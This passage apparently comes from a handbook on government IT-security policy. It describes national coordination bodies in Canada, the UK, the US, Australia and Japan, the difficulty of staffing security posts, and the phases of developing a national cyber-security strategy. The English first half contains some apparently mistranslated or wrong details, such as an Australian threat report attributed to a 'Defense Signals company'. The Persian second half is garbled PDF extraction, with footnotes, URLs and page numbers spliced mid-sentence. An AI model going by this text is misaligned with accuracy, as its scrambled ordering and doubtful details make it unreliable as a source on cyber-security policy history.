[21] Canada's Office of Critical Infrastructure Protection and Emergency Preparedness is a civilian organization that operates within the Department of National Defence.
[22] Home Office
[23] The UK Home Office has established a National Infrastructure Security Co-ordination Centre (NISCC) to work on critical infrastructure security issues, provide the necessary warnings and response assistance, and facilitate relationships between the public and private sectors for protecting information. Within NISCC there is a computer security emergency center called UNIRAS. NISCC also has an Electronic Attack Response Group (EARG) to help critical infrastructure organizations and government departments that suffer attacks. UNIRAS warns all UK organizations and companies once attacks become possible. For more information on the UK government's approach, see the NISCC website: http://www.niscc.gov.uk
[24] Computer Security Division of the National Institute of Standards & Technology
[25] In some respects the United States has a complicated model for coordination, and it may not be a good model for developing countries. In the United States the "national security committee" is responsible for the security of computer systems in both the public and private sectors, but the government information security management center has given responsibility for planning for government computer systems to the White House Office of Management and Budget, and the National Security Council in the White House is responsible for coordinating cyber-security policy.
[26] Under Australian law, executive agencies are non-penal organizations; where an agency's work spans the whole of government and it has some independence from the government structure, it must be established by the highest local government authority. The head of an executive agency is appointed by a minister, in this case the Minister for Communications and Information Technology, and is accountable only to that minister.
[27] For more information, see: http://www.kantei.go.jp/foreign/it/security/2000/0519taisei.html

Another organizational challenge for government is human resources.
Governments have difficulty attracting and retaining personnel who specialize in computer security. One solution is to offer scholarships for computer security studies, under which recipients commit to serve the government for a specified number of years. A short-term solution is a two-stage program run jointly with the private sector, in which cyber-security experts work for the government while all or part of their salary is paid by their private-sector employer. In both developed and developing countries, the human resources problem in cyber security may confront government with another fundamental difficulty, because, compared with the private sector, government cannot pay specialists in this field substantial salaries.

Developing a National Cyber-Security Strategy

The process of developing a national cyber-security strategy can be an effective tool for deciding what the nation's financial cyber-security vulnerabilities are, what government's responsibilities should be, and what policies and legislative reforms should be pursued. Such strategies can also define the relationship between government and the private sector. Here we focus mainly on those elements of national cyber-security strategies that concern the protection of government computers. Later in Part Four we discuss government's role in improving the security of private-sector systems. A look at the United States strategy illustrates the benefits of this exercise:

"In general, the private sector is well prepared to respond to the growing threats in cyberspace. In some specific cases, however, a response by the central government is more appropriate and more acceptable. Internally, continuing this work within government requires ensuring the security of government's own cyber infrastructure and of the assets needed to support its essential missions and services. Externally, government's role in cyber security will ensure that problems are resolved in cases where high transaction costs and legal barriers lead to major problems of cooperation; in cases where government operates in the absence of private-sector forces; and where analysis of the problems results in shared critical resources becoming unavailable for release." [28]

To date the United States has had the broadest and most extensive process for developing a national cyber-security strategy, and similar themes and topics can be seen in the work of other countries and international groups. Although the details of these processes, and the resulting laws and organizational structures, differ from country to country, the process of developing a cyber-security strategy resembles the one that many countries have used to develop national ICT strategies. [29] In fact, security is one component of national ICT strategies, and a cyber-security strategy can be produced using the same legal principles and methods used in drafting a national ICT development plan. For example, in March 2001 Japan incorporated cyber security into its policy priority program known as e-Japan. [30]

The experience of countries that have developed national cyber-security strategies shows that the process has certain common elements:

1. assessing national vulnerabilities and publishing public reports that present the overall picture and raise awareness among policymakers and the public;
2. establishing a leadership structure within the executive branch of government to oversee the development and implementation of policy;
3. developing a detailed national plan in consultation with the private sector;
4. adapting regulations and guidelines on matters such as sharing of and access to information, so as to create accountability.

Phase one is a detailed assessment of vulnerabilities together with awareness-raising. For example, in 1997 Australia published a report entitled Australia's National Information Infrastructure: Threats and Vulnerabilities [31]. The report, prepared by the board of directors of the Defense Signals company, leads the reader to the conclusion that Australian society is vulnerable to the relatively numerous deficiencies of computer networks, and that there is no formal, defined structure for coordinating and implementing government policy to protect essential infrastructures. [32] To study the subject, the President of the United States in 1996 created a body called the President's Critical Infrastructure Protection Board [33], made up of a number of individuals and legal entities. The board had no regulatory power and no permanent, fixed structure; rather, it provided a forum for reports, interviews and research, and published a report that drew the attention of policymakers, legal authorities, the mass media and the public. It made further notable recommendations in October 1997 and called for closer cooperation between the private sector and government.

[28] The National Strategy to Secure Cyberspace [U.S.], http://www.whitehouse.gov/pcipb, http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
[29] For more information, see footnote 17.
[30] http://www.kantei.go.jp/foreign/it/network/priority-all/index.html
[31] Australia's National Information Infrastructure: Threats & Vulnerabilities
Phase two is the creation of permanent structures within the executive branch to coordinate the development and implementation of policy. In Canada, for example, following publication of the results of an assessment by an internal Critical Infrastructure Protection Task Force [34], the government set up a coordination center for information gathering and protection, threat assessment and investigation of security incidents, as well as an Office of Critical Infrastructure Protection and Emergency Preparedness to provide leadership at the national level. [35]

In the United States, Clinton and Bush took several practical steps by establishing policy-making bodies within the executive branch. The plans called for the preparation of a national proposal for infrastructure protection. [36] These presidential directives did not authorize government agencies to oversee private-sector systems; instead they stressed the need for cooperation and information sharing between government and the private sector. Other leadership structures are discussed in the "Leadership and Organization" section.

Phase three is the development of the strategy. As noted above, a national cyber-security strategy can be a stand-alone document or part of a national ICT strategy. The key to this process is consultation between government and the private sector. In Japan, which has folded cyber security into its overall ICT strategy, the process was carried out jointly by the "IT Strategy Center" in the Cabinet and the "IT Strategy Council," which was made up of twenty experts and was established specifically to combine the capabilities of government and the private sector. [37]

[32] For more information, see the book cited in footnote 17.
[33] President's Critical Infrastructure Protection Board
[34] Critical Infrastructure Protection Task Force
[35] Office of Critical Infrastructure Protection & Emergency Preparedness [Canada], http://www.ocipep.gc.ca/critical/nciap/disc_e.asp
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻳﻚ ﺳﻨﺪ ﻣﺠﺰﺍ ﺍﺳـﺖ ﻭ ﺗﻬﻴﺔ ﺁﻥ ﻣﺤﺼﻮﻝ ﻓﺮﺁﻳﻨﺪﻱ ﻃﻮﻻﻧﻲ ﺍﺯ ﺗﺒﺎﺩﻝﻧﻈﺮﻫﺎﻱ ﻋﻤـﻮﻣﻲ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﻣـﺪﻳﺮﻳﺖ ﺷـﺪﻩ ﺍﺳﺖ .ﻧﮕﺎﺭﺵ ﺍﻭﻝ ﺍﺳﻨﺎﺩ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﻣﻨﺘـﺸﺮ ﺷﺪ ،ﻧﺴﺨﻪ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪﺓ ﺁﻥ ﺩﺭ ﭘـﺎﺋﻴﺰ ﺳـﺎﻝ ،۲۰۰۲ﻭ ﻧﮕـﺎﺭﺵ ﺁﺧﺮ ﺁﻥ ﺩﺭ ﻓﻮﺭﻳﺔ ٣٨.۲۰۰۳ﺩﺭ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ ﻃﺮﺣﻬـﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺎﻭﺭﻩﻫﺎﻱ ﺗﻔﺼﻴﻠﻲ ﺩﺭ ﺩﻭﻟﺖ ﻭ ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪ .ﺩﻩ ﻧﺸﺴﺖ ﻋﻤـﻮﻣﻲ ﻧﻴـﺰ ﺩﺭ ﺷﻬﺮﻫﺎﻱ ﻣﻬﻢ ﺟﻬﺎﻥ ﺑﻤﻨﻈـﻮﺭ ﺟﻤـﻊﺁﻭﺭﻱ ﻧﻴﺮﻭﻫـﺎﻱ ﻣـﻮﺭﺩ 33 Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm E.O. 13231, Critical Infrastructure Protection in the Information Age, October 16, 2001, http://ciao.gov/News/EOonCriticalInfrastructur eProtection101601.html e-Japan Security Policy Program, March 29, 2001, http://www.kantei.go.jp/foreign/it/network/priori ty-all/index.html 34 35 ﻛﻠﻴﻨﺘﻮﻥ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ "ﺗﺼﻤﻴﻤﺎﺕ ﺭﺍﻫﺒـﺮﺩﻱ ﺭﺋـﻴﺲ ﺟﻤﻬـﻮﺭ" ) (PDDﻣﻨﺘـﺸﺮ ﻛﺮﺩ: 63: Critical Infrastructure Protection, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-63.htm 62: Protection Against Unconventional Threats to the Homeland & Americans Overseas, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-62.htm ﺑﻌﺪ ﺍﺯ ۱۱ﺳﭙﺘﺎﻣﺒﺮ ۲۰۰۱ﻧﻴﺰ ﺑﻮﺵ ﺩﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺍﺟﺮﺍﻳﻲ ﺍﻣﻀﺎ ﻛﺮﺩ ﻛﻪ ﻃﺒﻖ ﺁﻧﻬـﺎ ﻋﻤﻠﻴـﺎﺕ ﻣﺠـﺪﺩﹰﺍ ﻣﻜﺎﻧﻴـﺎﺑﻲ ﻣـﻲﺷـﺪ ﻭ ﻣﻮﺟﻮﺩﻳﺘﻬـﺎﻱ ﺟﺪﻳﺪﻱ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪ: E.O. 13228, Establishing the Office of Homeland Security & the Homeland Security ۳۹ ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺁﻥ ﻋﺒﺎﺭﺗﺴﺖ ﺍﺯ The National Strategy to Secure Cyberspace: http://www.dhs.gov/interweb/assetlibrary/Natio nal_Cyberspace_Strategy.pdf. ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺎ ﻛﻤﻚ ﺍﺯ ﺳﻨﺪ ﺯﻳﺮ ﺗﻬﻴﻪ ﺷﺪ: The National Strategy for Physical Protection of Critical Infrastructures & Key Assets: http://www.dhs.gov/interweb/assetlibrary/Phys ical-Strategy.pdf. ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺍﺟﺰﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺭﺍ ﺷﺮﺡ ﻣـﻲﺩﻫﻨـﺪ ﻭ ﺩﺭ ﺟﻮﻻﻱ ۲۰۰۲ﺗﻮﺳﻂ ﻛﺎﺥ ﺳﻔﻴﺪ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ. 
37 ٢٣٩ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺑﺮﭘﺎ ﮔﺸﺖ .ﺩﺭ ﺍﻳﻦ ﻧﺸـﺴﺘﻬﺎ ﮔﺮﻭﻩ ﻫﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ -ﻣﺪﻧﻲ ،ﻫﻤﻜﺎﺭﺍﻥ ﺗﺠﺎﺭﻱ ،ﻭ ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ ﻳﻜﺪﻳﮕﺮ ﻣﺸﻮﺭﺕ ﻛﺮﺩﻧﺪ .ﺍﺯ ﺩﻳﮕﺮ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ٣٩ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺍﺷﺎﺭﻩ ﻛﺮﺩ. ﺩﺭ ﺳﻄﺢ ﻣﻨﻄﻘﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎ ﻓﻌﺎﻟﻴﺘﻬـﺎﻳﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺧﻮﺩ ﺭﺍ ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻳﻚ ﺳﻨﺪ ﻭﺍﺣﺪ ،ﺑﻠﻜﻪ ﻃﻲ ﭼﻨـﺪﻳﻦ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ ﺳﻠﺴﻠﻪ ﺍﺳﻨﺎﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ ٤١ ٤٠ ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ .ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺁﺳـﻴﺎ)(APEC ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ ﻛـﺎﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ ﺩﻭﺭ ) ٤٢(TELﻭ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﻓﻌـﺎﻝ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ٤٣.ﺳﺎﺯﻣﺎﻥ ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜﺎ ) ٤٤(OASﻣﺴﺌﻮﻟﻴﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﺭﺍ ﻧﻴﺰ ﺑــﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﺩ ٤٥.ﺩﺭ ﮊﻭﺋــﻦ ۲۰۰۳ﻣﺠﻤــﻊ ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜـﺎ ﻗﻄﻌﻨﺎﻣـﻪﺍﻱ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺩﺍﺧﻠـﻲ ﺑﻌﺪ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ،ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻣﻮﺿـﻮﻋﻲ ﻫﻤﺎﻫﻨـﮓ ﻭ ﻳﻜﭙﺎﺭﭼــﻪ ﺍﺯ ﺍﺳــﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺩﺭ ﺳــﻄﻮﺡ ﻣﻠــﻲ، ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺳﺖ: • ﻣﺸﺎﺭﻛﺖ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﺑﺨـﺸﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ٤٩.ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺻـﻠﻲ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ. 
• ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ "ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪﮔﺎﻥ ﺍﺯ ﺷــﺒﻜﻪ ﺍﺯ ﺟﻤﻠــﻪ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﮔﺎﻥ، ﺭﺍﻫﺒﺮﺍﻥ ،ﺍﭘﺮﺍﺗﻮﺭﻫﺎ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺗﻬﺪﻳﺪﺍﺕ ﻭﺍﺭﺩﻩ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻭ 39 40 ۴۳ 41 42 ﺍﻳﻦ ﺳﻨﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﭘﻴﺪﺍ ﻛﻨﻴﺪ: http://www.apecsec.org.sg/content/apec/apec _groups/working_groups/telecommunications _and_information.html ﺩﺭ ﺍﻛﺘﺒــﺮ ،۲۰۰۲ﻭﺯﻳــﺮﺍﻥ APECﺍﻫﻤﻴــﺖ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ APECﺭﺍ ﺩﺭ ﻋـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻨﺪ .ﺩﺭ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ،ﺁﻧـﺎﻥ ﺍﺯ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ TELﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻭ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺳـﺘﻮﺭ ﺩﺍﺩﻧﺪ ﻛﻪ ﺁﻧﺮﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ: ۴۵ http://203.127.220.67/apec/ministerial_statem ents/annual_ministerial/2002_14th_apec_mini sterial.html#policies 44 Organization of American States ﻭﻇﻴﻔﻪ ﺍﻭﻟﻴﻪ OASﺟﻨﺎﻳﺎﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻮﺩ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: http://www.oas.org/juridico/english/cyber_exp erts.htm Organization for Eonomic Cooperation and Development & Organization for Economic Cooperation Development, OECD Guidelines for the Security of Information Systems & Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M000340 00.pdf Implementation Plans for the OECD Guidelines for the Security of Information Systems & Networks: Towards a Culture of Security, Organization for Economic Cooperation & Development, Working Party on Information Security & Privacy, DSTI/ICCP/REG(2002)6 /FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/Link To/dsti-iccp-reg(2002)6-final 47 ﻗﻄﻌﻨﺎﻣﻪ ﺩﺭ ﺟﻠﺴﻪ ﭼﻬﺎﺭﻡ ﺩﺭ ۱۰ﮊﻭﺋﻦ ۲۰۰۳ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﻴﺪ. ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﻧﺴﺨﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﺍﺳﺖ: http://www.infodev-security.net/handbook Asia Pacific Economic Cooperation Telecommunications and Information Working Group Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 
)1939 (XXXIII-0/03 46 ۴۹ ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﺋﻴﺎﺕ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ: APEC, "Statement on the Security of "Information & Communications Infrastructure, Fifth APEC Ministerial Meeting on Telecommunications ans Information Industry,Shanghai, China, May 29-30, 2002, http://www.apecsec.org.sg/virtualib/minismtg/t elminAnnexB_SICT.html ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﻧﺴﺨﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ: http://www.infodev-security.net/handbook. 48 ﺑﺨﺶ ﭼﻬﺎﺭﻡ E-Security National Agenda [Australia], September 2001, http://www.noie.gov.au/projects/confidence/Pr otecting/nat_agenda.htm European Commission, Proposal for a Regulation of the European Parliament & of the Council - Establishing the European Network & Information Security Agency, Feb. 11, 2003, COM (2003) 63 Final, 2003/0032 (COD), http://europa.eu.int/information_society/eeuro pe/action_plan/safe/documents/nisa_en.pdf ﺁﻣﺮﻳﻜﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺳﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺷﺒﻜﻪﻫﺎ ﺗﺪﻭﻳﻦ ﻧﻤﻮﺩ ٤٦.ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ ) ٤٧(OECDﻧﻴﺰ ﺧـﻂﻣـﺸﻲﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺩﺭ ﺧﺼﻮﺹ ﺗﻬﻴﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻣﻨﺘـﺸﺮ ٤٨ ﺳﺎﺧﺖ. ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٤٠ ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻭ ﻧﻘﺶ ٥٠ ﺧﻮﺩ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ". • ﺗﺠﺮﺑﻴﺎﺕ ،ﺭﺍﻫﺒﺮﺩﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺗﻌﺪﺍﺩ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺑـﺼﻮﺭﺕ ﺩﺍﻭﻃﻠﺒﺎﻧـﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺗﻬﻴﻪ ﺷﻮﺩ ﻭ ﺗﺠﺮﺑﻴﺎﺕ ﺍﺯ ﻃﺮﻳـﻖ ﻣﺆﺳـﺴﺎﺕ ﻣﺸﺎﻭﺭ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺗﻮﺳـﻌﻪ ﻳﺎﺑـﺪ. ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍﻫﻨﻤﺎﻱ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﺍﺧﻠﻲ ﺩﻭﻟﺖ ﻫﺴﺘﻨﺪ .ﺩﻭﻟﺖ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ٥١ ﻓﻨﻲ ﺑﺮﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﻌﻴﻴﻦ ﻛﻨﺪ. • ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻼ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻛﺎﻣ ﹰ ﺑﺎ ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺣﻤـﻼﺕ ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳـﺪ ﺗﺸﻮﻳﻖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳـﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ،ﺑﺎ ﺩﻭﻟﺖ ،ﻭ ﻧﻴﺰ ﺑﺎ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ. 
